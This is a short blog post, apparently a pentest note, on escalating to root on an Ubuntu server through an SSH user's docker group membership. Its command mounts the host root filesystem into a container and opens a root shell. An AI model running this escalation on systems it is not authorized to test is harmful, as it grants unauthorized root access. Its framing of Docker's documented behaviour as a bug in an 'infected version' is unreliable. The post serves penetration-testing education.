hosting image

Pentest Docker Engine priv escalation

Situation:

  • ssh user with docker priv.
  • docker installed.
  • ubuntu server

 

usually normal docker usage is :

docker run hello-world
This command downloads a test image and runs it in a container. When the container runs, it prints an informational message and exits.

we got the priv

 to execute it …

Next :
  • docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash

     

  • Explanation :
    Parameter -v will create volume in docker instance , Parameter -it  makes docker in shell mode instead of daemon process.

and result is  .

 

infected version https://docs.docker.com/engine/install/linux-postinstall/

more info about the bug https://gtfobins.github.io/gtfobins/docker/

 

 

Leave a Reply

Your email address will not be published.